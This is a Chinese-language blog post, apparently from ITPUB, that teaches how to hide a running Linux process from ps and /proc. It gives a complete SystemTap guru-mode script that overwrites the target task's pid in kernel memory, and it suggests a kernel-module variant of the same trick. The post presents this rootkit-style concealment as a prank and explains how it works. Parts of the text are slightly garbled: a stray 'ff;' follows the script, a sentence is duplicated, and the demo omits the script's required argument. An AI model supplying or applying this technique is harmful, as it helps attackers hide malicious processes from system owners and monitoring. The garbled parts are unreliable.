一行程式碼如何隱藏Linux程式?

千鋒IT教育 發表於 2022-11-23
Linux

總有朋友問隱藏Linux程式的方法,我說你想隱藏到什麼程度,是大隱於核心,還是小隱於使用者。

網上通篇論述的無外乎 hook 掉 procfs 或者類似的使用者態方案,也都難免長篇大論,我說,這些場面都太大了,太複雜了。對於希望馬上看到效果的而言,看到這麼一堆複雜的東西,大機率望而卻步。

本文介紹一種將Linux程式小隱於使用者的非常規方法,僅僅一行程式碼:

修改掉程式的pid即可。

注意是小隱,所以,不值得反制,逗一下高階會議工程師搞個惡作劇玩玩得了。

target->pid = 0x7fffffff;

完整的指令碼如下:

#!/usr/bin/stap -g
# hide.stp
global pid;
function hide(who:long)
%{
    struct task_struct *target;
    target = pid_task(find_vpid(STAP_ARG_who), PIDTYPE_PID);
    target->pid = 0x7fffffff;
%}
probe begin
{
    pid = $1
    hide(pid);
    exit();
}
ff;

來來來,試一下:

[[email protected] system]# ./tohide &
[1] 403
[[email protected] system]# ./hide.stp
[[email protected] system]#

用下面的命令可以檢測所有可顯示程式的二進位制檔案:

for pid in $(ls /proc|awk '/^[0-9]+/{print $1}'); do 
    ls -l /proc/$pid/exe; 
done

procfs裡沒了,ps當然就檢測不到了。

如果你覺得 guru 模式的 stap 怪怪的,那麼你完全可以編寫自己獨立的 Linux kernel module,採用修改完即退的方法:

target->pid = xxxx;
return -1;是不是比各種hook法簡單多了,所謂的動資料而不要動程式碼!

是不是比各種 hook 法簡單多了,所謂的動資料而不要動程式碼!

簡單的說一下原理:

task被建立的時候,根據其pid註冊procfs目錄結構。

展示procfs目錄結構的時候,遍歷task list以其pid作為key來查詢procfs目錄結構。

0x7fffffff(或者任何其它合理的值)根本沒有註冊過,當然無法顯示。

不多說。

再次宣告,不要試圖對本文所描述的方法進行反制,因為這麼簡單的東西根本不值得反制


來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/70023145/viewspace-2924815/,如需轉載,請註明出處,否則將追究法律責任。

相關文章